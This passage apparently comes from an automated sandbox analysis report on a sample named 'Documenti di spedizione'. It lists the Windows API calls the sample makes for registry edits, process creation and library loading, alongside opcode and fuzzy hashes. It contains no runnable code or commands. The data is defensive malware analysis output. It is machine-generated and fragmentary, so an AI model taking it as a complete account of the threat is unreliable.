                                            • Instruction Fuzzy Hash: 2341F471A04515BACF107BB5DC45EAF3678EF41328B20823BF021B11E2DA3C8A419FAD
                                            APIs
                                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402B2F
                                            • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402B6B
                                            • RegCloseKey.ADVAPI32(?), ref: 00402B74
                                            • RegCloseKey.ADVAPI32(?), ref: 00402B99
                                            • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402BB7
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246456880.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000004.00000002.3246444105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246470185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246482951.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246501934.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: Close$DeleteEnumOpen
                                            • String ID:
                                            • API String ID: 1912718029-0
                                            • Opcode ID: ba179b4ab06ec51544505c7bb4ef6d82f25395ff453b8f9fc11c3f7a3e81ed6a
                                            • Instruction ID: cbb66f3b7e8ae2888f759c75a40f8dd5de3b5766fb854263a8955dc236021e84
                                            • Opcode Fuzzy Hash: ba179b4ab06ec51544505c7bb4ef6d82f25395ff453b8f9fc11c3f7a3e81ed6a
                                            • Instruction Fuzzy Hash: 39117C71A00108FFDF11AF90DE89DAA3B7DEB54345F004076FA05F10A0D378AE51AB69
                                            APIs
                                            • GetDC.USER32(?), ref: 00401D98
                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB2
                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401DBA
                                            • ReleaseDC.USER32(?,00000000), ref: 00401DCB
                                            • CreateFontIndirectA.GDI32(0040A808), ref: 00401E1A
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246456880.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000004.00000002.3246444105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246470185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246482951.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246501934.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                            • String ID:
                                            • API String ID: 3808545654-0
                                            • Opcode ID: 384e23ba8be56f1d8b58cd2f78efa8b6131d55f969df9b920b0b3fd3205056ac
                                            • Instruction ID: 31dc6bfce766dd2e9c365b6b9c1ce0fa0646d0edadaed3ffd0317ad467dc8ee1
                                            • Opcode Fuzzy Hash: 384e23ba8be56f1d8b58cd2f78efa8b6131d55f969df9b920b0b3fd3205056ac
                                            • Instruction Fuzzy Hash: 1E017572948340AFE7006B74AE4EB993FF4DB95315F10847AF201B62E2C6B905528F6E
                                            APIs
                                            • GetDlgItem.USER32(?), ref: 00401D3F
                                            • GetClientRect.USER32(00000000,?), ref: 00401D4C
                                            • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D6D
                                            • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D7B
                                            • DeleteObject.GDI32(00000000), ref: 00401D8A
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246456880.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000004.00000002.3246444105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246470185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246482951.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246501934.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                            • String ID:
                                            • API String ID: 1849352358-0
                                            • Opcode ID: bd1a246c87c7f6178c6ecc63fdf164811e3027df84ebbbc61871bc77a69c7b8e
                                            • Instruction ID: 3a73a5ecaa8fddf8dab02391599d10e6f088d4e67d6af50185a53a7dc2f76cba
                                            • Opcode Fuzzy Hash: bd1a246c87c7f6178c6ecc63fdf164811e3027df84ebbbc61871bc77a69c7b8e
                                            • Instruction Fuzzy Hash: D6F0FFB2A04119BFDB11EBA4DE88DAFBBBCEB44301B104476F601F2191C6749D018B79
                                            APIs
                                            • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C74
                                            • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C8C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246456880.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000004.00000002.3246444105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246470185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246482951.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246501934.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: MessageSend$Timeout
                                            • String ID: !
                                            • API String ID: 1777923405-2657877971
                                            • Opcode ID: ddb3ae1d6e1b3602016cf6e102a5b51033461e7a55de6e6a3b1605d6dd40c2f8
                                            • Instruction ID: 023f80fe09a274ffd38664002148efa248b1b49841e283c842910b226ff12a9e
                                            • Opcode Fuzzy Hash: ddb3ae1d6e1b3602016cf6e102a5b51033461e7a55de6e6a3b1605d6dd40c2f8
                                            • Instruction Fuzzy Hash: BA219171A44208BEEB15EFA4DA46AED7FB1EF84314F24403EF101B61D1DA7886408B28
                                            APIs
                                            • lstrlenA.KERNEL32(0041FD30,0041FD30,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047EC,000000DF,00000000,00000400,?), ref: 0040496F
                                            • wsprintfA.USER32 ref: 00404977
                                            • SetDlgItemTextA.USER32(?,0041FD30), ref: 0040498A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246456880.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000004.00000002.3246444105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246470185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246482951.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246501934.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: ItemTextlstrlenwsprintf
                                            • String ID: %u.%u%s%s
                                            • API String ID: 3540041739-3551169577
                                            • Opcode ID: 82e12f032b3efd850847d5b584d2a8547bd6d54b12269a14f91348113f1031b8
                                            • Instruction ID: 7f1be1aa0c85ccb86495671cb382a06f82cddcf8175a130fa0267404931b34df
                                            • Opcode Fuzzy Hash: 82e12f032b3efd850847d5b584d2a8547bd6d54b12269a14f91348113f1031b8
                                            • Instruction Fuzzy Hash: CF11B7736041283BDB0065799D45EAF3298DB85374F250637FA25F21D1E978CC1255EC
                                            APIs
                                            • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402411
                                            • lstrlenA.KERNEL32(00409C00,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402431
                                            • RegSetValueExA.ADVAPI32(?,?,?,?,00409C00,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040246E
                                            • RegCloseKey.ADVAPI32(?,?,?,00409C00,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040254F
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246456880.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000004.00000002.3246444105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246470185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246482951.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246501934.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: CloseCreateValuelstrlen
                                            • String ID:
                                            • API String ID: 1356686001-0
                                            • Opcode ID: 65fbc6128c6ea6ccac0771d36d25ae40eb91bbe92aaef5046d3fe99f3cf24475
                                            • Instruction ID: 45e6817f5ac0ad5077c8573445b5e51b6f54d3a00a8772886ac111494e5e57ea
                                            • Opcode Fuzzy Hash: 65fbc6128c6ea6ccac0771d36d25ae40eb91bbe92aaef5046d3fe99f3cf24475
                                            • Instruction Fuzzy Hash: B52181B1E00109BEEB10EFA4DE49EAF7BB8EB54358F20403AF505B61D1D6B95D019B28
                                            APIs
                                            • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 0040202A
                                              • Part of subcall function 00405110: lstrlenA.KERNEL32(0041F510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000,?), ref: 00405149
                                              • Part of subcall function 00405110: lstrlenA.KERNEL32(00402D22,0041F510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000), ref: 00405159
                                              • Part of subcall function 00405110: lstrcatA.KERNEL32(0041F510,00402D22,00402D22,0041F510,00000000,00000000,00000000), ref: 0040516C
                                              • Part of subcall function 00405110: SetWindowTextA.USER32(0041F510,0041F510), ref: 0040517E
                                              • Part of subcall function 00405110: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A4
                                              • Part of subcall function 00405110: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051BE
                                              • Part of subcall function 00405110: SendMessageA.USER32(?,00001013,?,00000000), ref: 004051CC
                                            • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040203A
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0040204A
                                            • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004020B4
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246456880.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000004.00000002.3246444105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246470185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246482951.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246501934.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                            • String ID:
                                            • API String ID: 2987980305-0
                                            • Opcode ID: b9f0aec67fea9bc98c5863c357296edba73ca0e05b72c9a1f083ca6005b565f3
                                            • Instruction ID: 7d08e1e337802b2334af88e0c199d29f708e40c37bf94ee781fb5d0f0b1c297d
                                            • Opcode Fuzzy Hash: b9f0aec67fea9bc98c5863c357296edba73ca0e05b72c9a1f083ca6005b565f3
                                            • Instruction Fuzzy Hash: 7B219571E00225F7DB207FA48E49A6E7A74AB44354F20417BF601B22D1D6BE4A42965E
                                            APIs
                                            • IsWindowVisible.USER32(?), ref: 004050B3
                                            • CallWindowProcA.USER32(?,?,?,?), ref: 00405104
                                              • Part of subcall function 00404128: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 0040413A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246456880.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000004.00000002.3246444105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246470185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246482951.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246501934.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: Window$CallMessageProcSendVisible
                                            • String ID:
                                            • API String ID: 3748168415-3916222277
                                            • Opcode ID: 0b9e3fe4afe9fd5950d24fc38bd805c0ffc83546a9c92a8d1e346af401a4be56
                                            • Instruction ID: e292fc6bb5149b142bd52d3e096dd2ae09329e4c6d4eed70fd370e7000aba408
                                            • Opcode Fuzzy Hash: 0b9e3fe4afe9fd5950d24fc38bd805c0ffc83546a9c92a8d1e346af401a4be56
                                            • Instruction Fuzzy Hash: B2018F71504609ABDF205F11ED84AEF3765EB84750F208037FA01B92D1C77A9D92AFAE
                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00405BAD
                                            • GetTempFileNameA.KERNEL32(?,?,00000000,?), ref: 00405BC7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246456880.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000004.00000002.3246444105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246470185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246482951.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246501934.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: CountFileNameTempTick
                                            • String ID: nsa
                                            • API String ID: 1716503409-2209301699
                                            • Opcode ID: fefc0482c854070ed442c91c2c9b831f833a608d20a08577fe9f9df7fb59a314
                                            • Instruction ID: bfd989d901498d13fd43eebbd57bf0dae5b4b0e38faf5f28c0e1a6b78de2ea97
                                            • Opcode Fuzzy Hash: fefc0482c854070ed442c91c2c9b831f833a608d20a08577fe9f9df7fb59a314
                                            • Instruction Fuzzy Hash: B7F082367086046BEB108F55EC04B9B7BACDF91750F10C03BFA08DA1D0E6B5F9548B59
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3269014634.0000000038CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_38cf0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $]q$$]q$$]q$$]q
                                            • API String ID: 0-858218434
                                            • Opcode ID: 408cb7bfcaee65500233ee0a2585bf5071516073915d6b2063f40af739af0b1f
                                            • Instruction ID: 270dac6aaae84177cde545006c8da80881fedc7f34b30c9ac7be03ddb992af2f
                                            • Opcode Fuzzy Hash: 408cb7bfcaee65500233ee0a2585bf5071516073915d6b2063f40af739af0b1f
                                            • Instruction Fuzzy Hash: 98B11834A00209CFEB58DF69D59469EB7A2FF84304F60893AD409EB355DB35DC82CB91
                                            APIs
                                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421538,Error launching installer), ref: 004056B1
                                            • CloseHandle.KERNEL32(?), ref: 004056BE
                                            Strings
                                            • Error launching installer, xrefs: 0040569B
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246456880.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000004.00000002.3246444105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246470185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246482951.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246501934.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: CloseCreateHandleProcess
                                            • String ID: Error launching installer
                                            • API String ID: 3712363035-66219284
                                            • Opcode ID: 8605fb0cc1bd08462260b177f6e223d0fe872a64a1cb3e3de70a479640e30f4e
                                            • Instruction ID: a84e3f3112e4284354e87e930577f618970dfa48977d7da17d28cbc3385d6636
                                            • Opcode Fuzzy Hash: 8605fb0cc1bd08462260b177f6e223d0fe872a64a1cb3e3de70a479640e30f4e
                                            • Instruction Fuzzy Hash: 36E04FB0A002097FEB009B60EC05F7B7ABCE710204F808571BD01F2160D278A8008A78
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246456880.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000004.00000002.3246444105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246470185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246482951.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246501934.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 813088101d1177fb169553b46c52c2ff17d2ea35d6802c76714b97bf352b3534
                                            • Instruction ID: 2e33bf0a2efd24b19013112e0e3dc0c5d96cbb3b8ddfa3d6198f03b0ea5f4905
                                            • Opcode Fuzzy Hash: 813088101d1177fb169553b46c52c2ff17d2ea35d6802c76714b97bf352b3534
                                            • Instruction Fuzzy Hash: 38A14271E00229CBDF28CFA8C8447ADBBB1FF44305F15806AD856BB281D7789A96DF44
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246456880.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000004.00000002.3246444105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246470185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246482951.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246501934.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 76287d30da9bd6127f444d76b1a2dea5d718215deeea3e4961f0482c034aff3f
                                            • Instruction ID: b6fdc69984dd60fe5839cdbb69547f11a37967466e553f406be5e4f069ddcdf3
                                            • Opcode Fuzzy Hash: 76287d30da9bd6127f444d76b1a2dea5d718215deeea3e4961f0482c034aff3f
                                            • Instruction Fuzzy Hash: 06912371E00228CBDF28CF98C8547ADBBB1FF44305F15816AD856BB291C778AA96DF44
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246456880.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000004.00000002.3246444105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246470185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246482951.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246501934.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9112cbabc6f4a79aea4e3429d0b79d6c933dfda102b28fdb5082a60d62602a4e
                                            • Instruction ID: c7cee2028620334147dbeeecb81edbae78790ee6bd2d36d3aed28758d5738f0f
                                            • Opcode Fuzzy Hash: 9112cbabc6f4a79aea4e3429d0b79d6c933dfda102b28fdb5082a60d62602a4e
                                            • Instruction Fuzzy Hash: CF813471E00228DBDF24CFA8C844BADBBB1FF44305F25816AD856BB291D7389996DF14
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246456880.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000004.00000002.3246444105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246470185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246482951.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246501934.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: db9708fb04e2e0ecb222d306fe81c02053fdbbf4ae968347cebcb7f9112ce6f9
                                            • Instruction ID: 57d0a4a62e73b261e138738b2685f27b9a830e1577229771e06a9dcc4a08ef7a
                                            • Opcode Fuzzy Hash: db9708fb04e2e0ecb222d306fe81c02053fdbbf4ae968347cebcb7f9112ce6f9
                                            • Instruction Fuzzy Hash: DC816771E04228DBDF24CFA8C844BADBBB1FF44315F11816AD856BB280C7786996DF44
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246456880.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000004.00000002.3246444105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246470185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246482951.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246501934.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 51b9571c4f2cef3f00a150e7480631ebf45f04a25ed8f4987f17413b8e50dd21
                                            • Instruction ID: 7a0e56a60353855b6858f4e45cba095cd8fb81da81d2b3e1620468e36a0fecf5
                                            • Opcode Fuzzy Hash: 51b9571c4f2cef3f00a150e7480631ebf45f04a25ed8f4987f17413b8e50dd21
                                            • Instruction Fuzzy Hash: E2710371E00228DBDF28CFA8C844BADBBB1FF44305F15806AD856BB291D7389996DF54
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246456880.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000004.00000002.3246444105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246470185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246482951.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246501934.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cd56666480845857346ca32992c88f0ff24d6c501f81c377169dfb98ddf17ec5
                                            • Instruction ID: 640397e2d056f1a05ee02a3664d9fcc147c5dfb75bdb54ac859d1c8af1b059c5
                                            • Opcode Fuzzy Hash: cd56666480845857346ca32992c88f0ff24d6c501f81c377169dfb98ddf17ec5
                                            • Instruction Fuzzy Hash: 7F712471E00228DBDF28CF98C844BADBBB1FF44305F15806AD856BB291C7789996DF48
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246456880.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000004.00000002.3246444105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246470185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246482951.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246501934.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5b6ae2104ab0ec81b4e73fa48072ed289b5e7c7f1ead31899d3077504e5afad2
                                            • Instruction ID: 45e0d9c6199636d87fa33ccb5d6651f7628d4ee42d5e4054af8bad143df77737
                                            • Opcode Fuzzy Hash: 5b6ae2104ab0ec81b4e73fa48072ed289b5e7c7f1ead31899d3077504e5afad2
                                            • Instruction Fuzzy Hash: D1714771E00228DBDF28CF98C844BADBBB1FF44305F15806AD956BB291C778AA56DF44
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3269014634.0000000038CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_38cf0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR]q$LR]q$$]q$$]q
                                            • API String ID: 0-3527005858
                                            • Opcode ID: 37b6b5f1a8465ecb39ac377d6bdf8f10595faa234b7895d780dd46eb3df3eb64
                                            • Instruction ID: e3ea27fd55608fbc25b2d823d153fae9d3a8f65783748c441e86db405d191064
                                            • Opcode Fuzzy Hash: 37b6b5f1a8465ecb39ac377d6bdf8f10595faa234b7895d780dd46eb3df3eb64
                                            • Instruction Fuzzy Hash: 3951DE347002059FEB58DF28C890A5AB7E6FF88704F148579E905EB3A5DB36ED02CB91
                                            APIs
                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D2C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405ADF
                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405AF7
                                            • CharNextA.USER32(00000000,?,00000000,00405D2C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B08
                                            • lstrlenA.KERNEL32(00000000,?,00000000,00405D2C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B11
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246456880.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000004.00000002.3246444105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246470185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246482951.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000004.00000002.3246501934.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: lstrlen$CharNextlstrcmpi
                                            • String ID:
                                            • API String ID: 190613189-0
                                            • Opcode ID: ca0b18bb87844b4bf03c2f7d3918b69422ab9094ff5260ece92dc9b1c2472986
                                            • Instruction ID: b8bae3ead32ec2695fa88c6f2b94aa478c41e31f8fdb951db119f3f4d21ee890
                                            • Opcode Fuzzy Hash: ca0b18bb87844b4bf03c2f7d3918b69422ab9094ff5260ece92dc9b1c2472986
                                            • Instruction Fuzzy Hash: C1F0C231605518BFCB029FA5DC4099FBBB8EF46350B2140A5F800F7250D274FE019BA9